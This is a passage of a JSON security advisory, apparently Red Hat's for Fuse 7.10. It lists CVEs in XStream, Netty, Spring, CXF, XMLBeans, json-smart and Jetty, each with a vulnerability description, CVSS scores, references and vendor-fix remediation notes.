"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "XStream: ReDoS vulnerability"
},
{
"cve": "CVE-2021-21349",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2021-03-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1942635"
}
],
"notes": [
{
"category": "description",
"text": "XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream\u0027s security framework with a whitelist limited to the minimal required types. If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.16.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "XStream: SSRF can be activated unmarshalling with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21349"
},
{
"category": "external",
"summary": "RHBZ#1942635",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942635"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21349",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21349"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21349",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21349"
}
],
"release_date": "2021-03-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "XStream: SSRF can be activated unmarshalling with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host"
},
{
"cve": "CVE-2021-21350",
"cwe": {
"id": "CWE-434",
"name": "Unrestricted Upload of File with Dangerous Type"
},
"discovery_date": "2021-03-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1942637"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream. A remote attacker may be able to execute arbitrary code only by manipulating the processed input stream. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "XStream: Unsafe deserizaliation of com.sun.org.apache.bcel.internal.util.ClassLoader",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21350"
},
{
"category": "external",
"summary": "RHBZ#1942637",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942637"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21350",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21350"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21350",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21350"
}
],
"release_date": "2021-03-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "XStream: Unsafe deserizaliation of com.sun.org.apache.bcel.internal.util.ClassLoader"
},
{
"cve": "CVE-2021-21351",
"cwe": {
"id": "CWE-434",
"name": "Unrestricted Upload of File with Dangerous Type"
},
"discovery_date": "2021-03-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1942642"
}
],
"notes": [
{
"category": "description",
"text": "XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream\u0027s security framework with a whitelist limited to the minimal required types. If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.16.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "XStream: allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21351"
},
{
"category": "external",
"summary": "RHBZ#1942642",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942642"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21351",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21351"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21351",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21351"
}
],
"release_date": "2021-03-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "XStream: allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream"
},
{
"cve": "CVE-2021-21409",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2021-03-30T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1944888"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. There is an issue where the content-length header is not validated correctly if the request uses a single Http2HeaderFrame with the endstream set to true. This flaw leads to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. The highest threat from this vulnerability is to integrity.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: Request smuggling via content-length header",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Satellite ships a vulnerable Netty version embedded in Candlepin. However, it is not directly vulnerable since the HTTP requests are handled by Tomcat and not by Netty.\nRed Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.\n\nIn OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec-http package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21409"
},
{
"category": "external",
"summary": "RHBZ#1944888",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21409",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21409"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32",
"url": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32"
}
],
"release_date": "2021-03-30T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "netty: Request smuggling via content-length header"
},
{
"cve": "CVE-2021-22118",
"cwe": {
"id": "CWE-281",
"name": "Improper Preservation of Permissions"
},
"discovery_date": "2021-06-22T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1974854"
}
],
"notes": [
{
"category": "description",
"text": "In Spring Framework, versions 5.2.x prior to 5.2.15 and versions 5.3.x prior to 5.3.7, a WebFlux application is vulnerable to a privilege escalation: by (re)creating the temporary storage directory, a locally authenticated malicious user can read or modify files that have been uploaded to the WebFlux application, or overwrite arbitrary files with multipart request data.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "spring-web: (re)creating the temporary storage directory could result in a privilege escalation within WebFlux application",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform (OCP) the jenkins package bundles the vulnerable version of spring-framework, but as Jenkins is not a type of WebFlux application is not impacted by this vulnerability. Therefore the OCP components have been marked as affected/wontfix. This may be fixed in a future release.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-22118"
},
{
"category": "external",
"summary": "RHBZ#1974854",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1974854"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-22118",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22118"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22118",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22118"
},
{
"category": "external",
"summary": "https://github.com/spring-projects/spring-framework/issues/26931",
"url": "https://github.com/spring-projects/spring-framework/issues/26931"
},
{
"category": "external",
"summary": "https://tanzu.vmware.com/security/cve-2021-22118",
"url": "https://tanzu.vmware.com/security/cve-2021-22118"
}
],
"release_date": "2021-05-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "spring-web: (re)creating the temporary storage directory could result in a privilege escalation within WebFlux application"
},
{
"cve": "CVE-2021-22696",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-04-02T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1946341"
}
],
"notes": [
{
"category": "description",
"text": "CXF supports (via JwtRequestCodeFilter) passing OAuth 2 parameters via a JWT token as opposed to query parameters (see: The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request (JAR)). Instead of sending a JWT token as a \"request\" parameter, the spec also supports specifying a URI from which to retrieve a JWT token from via the \"request_uri\" parameter. CXF was not validating the \"request_uri\" parameter (apart from ensuring it uses \"https) and was making a REST request to the parameter in the request to retrieve a token. This means that CXF was vulnerable to DDos attacks on the authorization server, as specified in section 10.4.1 of the spec. This issue affects Apache CXF versions prior to 3.4.3; Apache CXF versions prior to 3.3.10.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cxf: OAuth 2 authorization service vulnerable to DDos attacks",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-22696"
},
{
"category": "external",
"summary": "RHBZ#1946341",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1946341"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-22696",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22696"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22696",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22696"
},
{
"category": "external",
"summary": "https://cxf.apache.org/security-advisories.data/CVE-2021-22696.txt.asc",
"url": "https://cxf.apache.org/security-advisories.data/CVE-2021-22696.txt.asc"
}
],
"release_date": "2021-04-02T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "cxf: OAuth 2 authorization service vulnerable to DDos attacks"
},
{
"cve": "CVE-2021-23926",
"cwe": {
"id": "CWE-776",
"name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
},
"discovery_date": "2021-01-29T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1922102"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found when parsing XML files using XMLBeans 2.6.0 or below. The underlying parser created by XMLBeans could be susceptible to XML External Entity (XXE) attacks. The highest threat from this vulnerability is to confidentiality and system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xmlbeans: allowed malicious XML input may lead to XML Entity Expansion attack",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-23926"
},
{
"category": "external",
"summary": "RHBZ#1922102",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1922102"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-23926",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-23926"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-23926",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23926"
}
],
"release_date": "2021-01-13T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
},
{
"category": "workaround",
"details": "Affected users are advised to update to Apache XMLBeans 3.0.0 or above, which fixes this vulnerability.",
"product_ids": [
"Red Hat Fuse 7.10"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "xmlbeans: allowed malicious XML input may lead to XML Entity Expansion attack"
},
{
"cve": "CVE-2021-27568",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2021-03-02T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1939839"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in json-smart. When an exception is thrown from a function, but is not caught, the program using the library may crash or expose sensitive information. The highest threat from this vulnerability is to data confidentiality and system availability.\r\n\r\nIn OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of json-smart package.\r\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\r\nThis may be fixed in the future.\r\n\r\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "json-smart: uncaught exception may lead to crash or information disclosure",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-27568"
},
{
"category": "external",
"summary": "RHBZ#1939839",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1939839"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-27568",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-27568"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-27568",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27568"
}
],
"release_date": "2021-02-23T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "json-smart: uncaught exception may lead to crash or information disclosure"
},
{
"cve": "CVE-2021-28163",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2021-04-01T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1945710"
}
],
"notes": [
{
"category": "description",
"text": "If the ${jetty.base} directory or the ${jetty.base}/webapps directory is a symlink the contents of the ${jetty.base}/webapps directory may be deployed as a static web application, exposing the content of the directory for download. The highest threat from this vulnerability is to data confidentiality.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jetty: Symlink directory exposes webapp directory contents",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform (OCP), the hive/presto/hadoop components that comprise the OCP metering stack, ship the vulnerable version of jetty.\nSince the release of OCP 4.6, the metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated\n\nRed Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.\n\nRed Hat CodeReady Studio 12 is not affected by this vulnerability because it does not ship a vulnerable version of jetty.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-28163"
},
{
"category": "external",
"summary": "RHBZ#1945710",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945710"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-28163",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-28163"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-28163",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28163"
},
{
"category": "external",
"summary": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-j6qj-j888-vvgq",
"url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-j6qj-j888-vvgq"
}
],
"release_date": "2021-04-01T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 2.7,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jetty: Symlink directory exposes webapp directory contents"
},
{
"cve": "CVE-2021-28164",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2021-04-01T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1945712"
}
],
"notes": [
{
"category": "description",
"text": "In Jetty the default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. An attacker can use this vulnerability to reveal sensitive information regarding the implementation of a web application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jetty: Ambiguous paths can access WEB-INF",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.\n\nRed Hat CodeReady Studio 12 is not affected by this vulnerability because it does not ship a vulnerable version of jetty.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
